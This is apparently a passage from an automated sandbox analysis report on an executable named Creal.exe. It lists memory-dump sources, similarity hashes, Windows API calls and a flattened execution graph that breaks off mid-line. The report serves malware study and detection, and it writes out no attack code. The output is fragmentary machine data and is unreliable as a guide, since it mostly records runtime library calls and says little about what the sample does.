                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                                        • Instruction ID: 0f736aaa02517f72cec70537d4fc75f897e4461e6fc86ab473e2dafcd1e7a00d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3113020F2D65292FAD4AF219B9127D52429F447B0F144737D92ED7ADEDE2CA4618300
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6D9241B6A), ref: 00007FF6D924295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                        • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                        • Instruction ID: d24d9175cb35377a766d0999425e1f42d4b57bcc98542d1fe6e1db3ec74819c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E031F422B2868152F720AF65AA416FE6294BF987D4F400133EE8DD3B59EF3CD166C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                        • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                        • Instruction ID: 86ff5cfed6685b253c51e96a20e5fbbff51d6e43b47276f1da68b3469d468cea
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84318F32A29A8289FB60EF62E9552FD6360FF88788F440136EA4D87B59DF3CD114C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6D924918F,?,00007FF6D9243C55), ref: 00007FF6D9242BA0
                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF6D9242C2A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                        • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                        • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                        • Instruction ID: 85dce56bba449f1340d93f693842ff1636657b289a24ffa1f38b38f494c6c679
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7219C62B28B4182F7109F55B9457EE73A4EB88780F404136EA8D97A5ADE3CE225C780
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6D9241B99), ref: 00007FF6D9242760
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B3AF
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B3CE
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B3F6
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B407
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B418
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9259046
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: GetLastError.KERNEL32(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A968
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6D924CBA5), ref: 00007FF6D9259064
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                        • API String ID: 3580290477-3523861777
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:9.5%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                        Total number of Limit Nodes:69
16549->16559 16552 7ff65e29a948 __free_lconv_mon 11 API calls 16550->16552 16551 7ff65e29a504 __CxxCallCatchBlock 45 API calls 16553 7ff65e2a1068 16551->16553 16552->16546 16554->16549 16555->16549 16556->16549 16558 7ff65e29a900 _isindst 17 API calls 16557->16558 16558->16559 16559->16551 16561 7ff65e2996d0 16560->16561 16564 7ff65e2996d9 16560->16564 16561->16564 16675 7ff65e299198 16561->16675 16564->16419 16564->16420 16567 7ff65e2a6254 16566->16567 16568 7ff65e2a7139 16566->16568 16569 7ff65e2a6261 16567->16569 16574 7ff65e2a6297 16567->16574 16570 7ff65e294f4c 45 API calls 16568->16570 16572 7ff65e294f08 _get_daylight 11 API calls 16569->16572 16586 7ff65e2a6208 16569->16586 16571 7ff65e2a716d 16570->16571 16575 7ff65e2a7172 16571->16575 16579 7ff65e2a7183 16571->16579 16582 7ff65e2a719a 16571->16582 16576 7ff65e2a626b 16572->16576 16573 7ff65e2a62c1 16577 7ff65e294f08 _get_daylight 11 API calls 16573->16577 16574->16573 16578 7ff65e2a62e6 16574->16578 16575->16413 16580 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16576->16580 16581 7ff65e2a62c6 16577->16581 16587 7ff65e294f4c 45 API calls 16578->16587 16594 7ff65e2a62d1 16578->16594 16583 7ff65e294f08 _get_daylight 11 API calls 16579->16583 16584 7ff65e2a6276 16580->16584 16585 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16581->16585 16589 7ff65e2a71a4 16582->16589 16590 7ff65e2a71b6 16582->16590 16588 7ff65e2a7188 16583->16588 16584->16413 16585->16594 16586->16413 16587->16594 16595 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16588->16595 16591 7ff65e294f08 _get_daylight 11 API calls 16589->16591 16592 7ff65e2a71de 16590->16592 16593 7ff65e2a71c7 16590->16593 16596 7ff65e2a71a9 16591->16596 16938 7ff65e2a8f4c 16592->16938 16929 7ff65e2a62a4 16593->16929 16594->16413 16595->16575 16599 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16596->16599 16599->16575 16601 7ff65e294f08 _get_daylight 11 API calls 16601->16575 16603 7ff65e2a33fe 16602->16603 16604 7ff65e2a341b 16602->16604 
16603->16604 16605 7ff65e2a340c 16603->16605 16606 7ff65e2a3425 16604->16606 16978 7ff65e2a7c38 16604->16978 16607 7ff65e294f08 _get_daylight 11 API calls 16605->16607 16985 7ff65e2a7c74 16606->16985 16610 7ff65e2a3411 __scrt_get_show_window_mode 16607->16610 16610->16438 16612 7ff65e294f4c 45 API calls 16611->16612 16613 7ff65e2a72aa 16612->16613 16614 7ff65e2a72b8 16613->16614 16997 7ff65e29ef24 16613->16997 17000 7ff65e2954ac 16614->17000 16618 7ff65e2a73a4 16620 7ff65e2a73b5 16618->16620 16622 7ff65e29a948 __free_lconv_mon 11 API calls 16618->16622 16619 7ff65e294f4c 45 API calls 16621 7ff65e2a7327 16619->16621 16623 7ff65e2a0ba3 16620->16623 16625 7ff65e29a948 __free_lconv_mon 11 API calls 16620->16625 16624 7ff65e29ef24 5 API calls 16621->16624 16626 7ff65e2a7330 16621->16626 16622->16620 16623->16457 16623->16458 16624->16626 16625->16623 16627 7ff65e2954ac 14 API calls 16626->16627 16628 7ff65e2a738b 16627->16628 16628->16618 16629 7ff65e2a7393 SetEnvironmentVariableW 16628->16629 16629->16618 16631 7ff65e2a10ac 16630->16631 16637 7ff65e2a108f 16630->16637 16632 7ff65e29eb98 _get_daylight 11 API calls 16631->16632 16640 7ff65e2a10d0 16632->16640 16633 7ff65e2a1131 16635 7ff65e29a948 __free_lconv_mon 11 API calls 16633->16635 16634 7ff65e29a504 __CxxCallCatchBlock 45 API calls 16636 7ff65e2a115a 16634->16636 16635->16637 16637->16470 16638 7ff65e29eb98 _get_daylight 11 API calls 16638->16640 16639 7ff65e29a948 __free_lconv_mon 11 API calls 16639->16640 16640->16633 16640->16638 16640->16639 16641 7ff65e2a0474 37 API calls 16640->16641 16642 7ff65e2a1140 16640->16642 16644 7ff65e2a1154 16640->16644 16641->16640 16643 7ff65e29a900 _isindst 17 API calls 16642->16643 16643->16644 16644->16634 16646 7ff65e299715 16645->16646 16647 7ff65e29970c 16645->16647 16646->16488 16646->16489 16647->16646 17022 7ff65e29920c 16647->17022 16652 7ff65e2a6ff9 16651->16652 16655 7ff65e2a7026 16651->16655 16653 7ff65e2a6ffe 16652->16653 16652->16655 16654 7ff65e294f08 
_get_daylight 11 API calls 16653->16654 16657 7ff65e2a7003 16654->16657 16656 7ff65e2a706a 16655->16656 16659 7ff65e2a7089 16655->16659 16673 7ff65e2a705e __crtLCMapStringW 16655->16673 16658 7ff65e294f08 _get_daylight 11 API calls 16656->16658 16660 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16657->16660 16661 7ff65e2a706f 16658->16661 16662 7ff65e2a7093 16659->16662 16663 7ff65e2a70a5 16659->16663 16664 7ff65e2a700e 16660->16664 16666 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16661->16666 16667 7ff65e294f08 _get_daylight 11 API calls 16662->16667 16665 7ff65e294f4c 45 API calls 16663->16665 16664->16482 16669 7ff65e2a70b2 16665->16669 16666->16673 16668 7ff65e2a7098 16667->16668 16670 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16668->16670 16669->16673 17069 7ff65e2a8b08 16669->17069 16670->16673 16673->16482 16674 7ff65e294f08 _get_daylight 11 API calls 16674->16673 16676 7ff65e2991b1 16675->16676 16677 7ff65e2991ad 16675->16677 16698 7ff65e2a25f0 16676->16698 16677->16564 16690 7ff65e2994ec 16677->16690 16682 7ff65e2991cf 16724 7ff65e29927c 16682->16724 16683 7ff65e2991c3 16685 7ff65e29a948 __free_lconv_mon 11 API calls 16683->16685 16685->16677 16687 7ff65e29a948 __free_lconv_mon 11 API calls 16688 7ff65e2991f6 16687->16688 16689 7ff65e29a948 __free_lconv_mon 11 API calls 16688->16689 16689->16677 16691 7ff65e299515 16690->16691 16693 7ff65e29952e 16690->16693 16691->16564 16692 7ff65e2a07e8 WideCharToMultiByte 16692->16693 16693->16691 16693->16692 16694 7ff65e29eb98 _get_daylight 11 API calls 16693->16694 16695 7ff65e2995be 16693->16695 16697 7ff65e29a948 __free_lconv_mon 11 API calls 16693->16697 16694->16693 16696 7ff65e29a948 __free_lconv_mon 11 API calls 16695->16696 16696->16691 16697->16693 16699 7ff65e2991b6 16698->16699 16700 7ff65e2a25fd 16698->16700 16704 7ff65e2a292c GetEnvironmentStringsW 16699->16704 16743 7ff65e29b224 16700->16743 16705 7ff65e2991bb 16704->16705 16706 7ff65e2a295c 16704->16706 16705->16682 
16705->16683 16707 7ff65e2a07e8 WideCharToMultiByte 16706->16707 16708 7ff65e2a29ad 16707->16708 16709 7ff65e2a29b4 FreeEnvironmentStringsW 16708->16709 16710 7ff65e29d5fc _fread_nolock 12 API calls 16708->16710 16709->16705 16711 7ff65e2a29c7 16710->16711 16712 7ff65e2a29cf 16711->16712 16713 7ff65e2a29d8 16711->16713 16714 7ff65e29a948 __free_lconv_mon 11 API calls 16712->16714 16715 7ff65e2a07e8 WideCharToMultiByte 16713->16715 16716 7ff65e2a29d6 16714->16716 16717 7ff65e2a29fb 16715->16717 16716->16709 16718 7ff65e2a29ff 16717->16718 16719 7ff65e2a2a09 16717->16719 16720 7ff65e29a948 __free_lconv_mon 11 API calls 16718->16720 16721 7ff65e29a948 __free_lconv_mon 11 API calls 16719->16721 16722 7ff65e2a2a07 FreeEnvironmentStringsW 16720->16722 16721->16722 16722->16705 16725 7ff65e2992a1 16724->16725 16726 7ff65e29eb98 _get_daylight 11 API calls 16725->16726 16737 7ff65e2992d7 16726->16737 16727 7ff65e2992df 16728 7ff65e29a948 __free_lconv_mon 11 API calls 16727->16728 16730 7ff65e2991d7 16728->16730 16729 7ff65e299352 16731 7ff65e29a948 __free_lconv_mon 11 API calls 16729->16731 16730->16687 16731->16730 16732 7ff65e29eb98 _get_daylight 11 API calls 16732->16737 16733 7ff65e299341 16923 7ff65e2994a8 16733->16923 16734 7ff65e29a4a4 __std_exception_copy 37 API calls 16734->16737 16737->16727 16737->16729 16737->16732 16737->16733 16737->16734 16738 7ff65e299377 16737->16738 16741 7ff65e29a948 __free_lconv_mon 11 API calls 16737->16741 16740 7ff65e29a900 _isindst 17 API calls 16738->16740 16739 7ff65e29a948 __free_lconv_mon 11 API calls 16739->16727 16742 7ff65e29938a 16740->16742 16741->16737 16744 7ff65e29b250 FlsSetValue 16743->16744 16745 7ff65e29b235 FlsGetValue 16743->16745 16746 7ff65e29b242 16744->16746 16748 7ff65e29b25d 16744->16748 16745->16746 16747 7ff65e29b24a 16745->16747 16749 7ff65e29a504 __CxxCallCatchBlock 45 API calls 16746->16749 16751 7ff65e29b248 16746->16751 16747->16744 16750 7ff65e29eb98 _get_daylight 11 API calls 16748->16750 16752 
